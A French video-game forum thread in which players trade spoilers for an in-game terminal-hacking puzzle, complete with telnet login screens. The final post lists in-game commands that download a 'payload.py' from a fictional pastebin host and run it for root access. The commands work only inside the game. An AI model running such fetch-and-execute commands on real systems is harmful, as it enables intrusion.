[spoil]Gagnant-gagnant

Répondre
Partager Rechercher
Tous le monde fait cette mission par le chemin via les suites logiques, mais en tant que geek j'aimerai faire cette quête avec l'un de mes perso via les lignes de commande : choix 2

pour l'instant j'ai passé que la première ligne de commande

Cliquez ce bouton ou survolez le contenu pour afficher le spoiler
telnet comsat.term.entry


indice je pense pour la commande suivante c'est :
possible exploitation de privilège par le pastebin du responsable informatique.

si un admin unix passe par la...
Solution :

Cliquez ce bouton ou survolez le contenu pour afficher le spoiler
Alors moi j'ai fait "1" +entrer jusqu'a se que cella valide l'étape.je sais pas si cétais un bug que cella fonction comme sa mais bon ...
Cliquez ce bouton ou survolez le contenu pour afficher le spoiler
Perso j'ai cherché sur pastebin.com, voir si je trouvais rien au sujet de la commande comsat bidule, mais j'ai rien trouvé. Je serais assez curieux de savoir comment on la résoud par ce chemin ceci dit !
Cool
Bonjour,

J'ai trouvé un site qui pourra aider les gens qui ont du mal avec l'énigme de gagnant gagnant, il y a des solutions pour diverses quête du jeu je n'ai pas tout exploré mais ils ont l'air d'avoir une bonne base de connaissance !

Cliquez ce bouton ou survolez le contenu pour afficher le spoiler
http://www.jeuxvideomagazine.com/sol...rld-a1059876/7
oui mais c'est la solution par jeux mathématique , c'est pas celle là qu'on cherche ^^

en sus voici la retranscription des différents écrans (avec le dernier celui ou je suis bloqué)

Cliquez ce bouton ou survolez le contenu pour afficher le spoiler
Accès manuel autorisé.
Possible exploitation de privilège par le pastebin du responsable informatique.

Accès via comsat.term.entry en temps qu'invité suggéré

Saisissez "outils" pour voir les utilitaires disponibles pendant la prise de contrôle manuelle

après avoir fait la connexion distante. c'est que ce soit possible qu'il me pousse a me dire qu'on pet faire cette quête de cette façon
Cliquez ce bouton ou survolez le contenu pour afficher le spoiler
trying 262.116.19.50
Connected to cs1 (262.116.19.50).
Escape is '^'.
Red Pill Enterprise Linux release 2 (Sheeva Update 4)
Kernel 2.4.21-14-SEsmp on an amd64

login: guest
Password: guest

j'avais tenté un mj, il a rien voulu lâcher comme info..
P.S évidemment outils ou tools ne donnent rien
Zut alors, j'ai fait 1 jusqu'au bout, j'ai trouvé ça bizarre mais je me suis pas posé de question étant donné que les commandes qui apparaissent m'avaient l'air correctes.

Je regrette de ne pas les avoir regardé plus que ça...
bon je pense tenir une piste mais il me manque l’instruction pour que ça marche, je me suis avancer en regardant sur youtube les vidéo de la quête et
Cliquez ce bouton ou survolez le contenu pour afficher le spoiler
pour la phase 2 je lit qu'il y a une tentative de login en admin avec un ^C en mot de passe et ça ne passe pas, donc c'est que ça a du passer dans la phase un, par contre j’ai tenté sudo, su, su -, su admin et les variante et aucun résultat, l'instruction est refusé (un vrai linux j'aurais pus comprendre pourquoi ^^)

bon j'ai trouver, et j'en suis pas fier, en trichant (rdb extractor et un coup de pot je saurait pas recommencer)

voici les commandes (et comment on est censé trouvé çà... doit y avoir un problème)

Cliquez ce bouton ou survolez le contenu pour afficher le spoiler
$ wget -0 payload.py http://share.pastebin.rui/?bin=F16CC92B
$ python ./payload.py
# id
# /opt/com/status -v
# /etc/init.d/rlogin restart
# tail -n 10 /var/log/rlogin.log


Dernière modification par thauthau ; 24/07/2012 à 14h25.
Répondre

Connectés sur ce fil

 
1 connecté (0 membre et 1 invité) Afficher la liste détaillée des connectés